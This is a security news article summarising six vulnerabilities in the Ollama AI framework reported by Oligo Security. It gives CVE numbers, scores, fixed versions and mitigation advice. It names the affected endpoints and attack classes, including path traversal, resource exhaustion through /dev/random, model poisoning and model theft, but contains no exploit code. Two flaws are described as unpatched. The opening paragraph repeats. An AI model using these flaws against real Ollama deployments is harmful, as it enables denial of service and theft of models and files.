DoS, model theft, and poisoning could be made possible by serious flaws in the Ollama AI framework.
Researchers studying cybersecurity have identified six security holes in the Ollama artificial intelligence (AI) framework that a malevolent actor may use to carry out a variety of tasks, such as model theft, denial-of-service attacks, and model poisoning.
Researchers studying cybersecurity have identified six security holes in the Ollama artificial intelligence (AI) framework that a malevolent actor may use to carry out a variety of tasks, such as model theft, denial-of-service attacks, and model poisoning.
Researcher Avi Lumelsky of Oligo Security stated in a paper released last week that "collectively, the vulnerabilities could allow an attacker to carry out a wide range of malicious actions with a single HTTP request, including denial-of-service (DoS) attacks, model poisoning, model theft, and more."
On Windows, Linux, and macOS computers, users can install and run large language models (LLMs) locally using the open-source Ollama application. 7,600 forks have been made to its GitHub project repository thus far.
The six vulnerabilities are briefly described below:
1. Version 0.1.47 fixes CVE-2024-39719, a vulnerability that allows an attacker to use /api/create an endpoint to find out whether a file is on the server (CVSS score: 7.5).
2. Version 0.1.46 fixes CVE-2024-39720, an out-of-bounds read vulnerability that might cause the application to crash via the /api/create endpoint, resulting in a denial-of-service scenario (CVSS score: 8.2).
3. A vulnerability is known as CVE-2024-39721 (CVSS score: 7.5) that results in resource depletion and, eventually, a denial of service when repeatedly calling the /api/create endpoint with the file "/dev/random" as input has been fixed in version 0.1.34.
4. The files on the server and the complete directory structure on which Ollama is installed are exposed due to a path traversal vulnerability in the api/push endpoint (CVE-2024-39722; CVSS score: 7.5) (fixed in version 0.1.46).
5. Model poisoning through the /api/pull endpoint from an untrusted source is possible due to a vulnerability (No CVE designation, Unpatched).
6. A flaw that could allow model theft to an untrusted recipient via the /api/push endpoint (No CVE name, Unpatched).
For both unfixed vulnerabilities, Ollama's maintainers advise users to utilize a web application firewall or proxy to filter which endpoints are accessible over the internet. "Meaning that, by default, not all endpoints should be exposed," stated Lumelsky. That's a risky supposition. Not everyone knows that or filters Ollama's HTTP route. As part of every deployment, these endpoints are now accessible via Ollama's default port without any kind of documentation or isolation.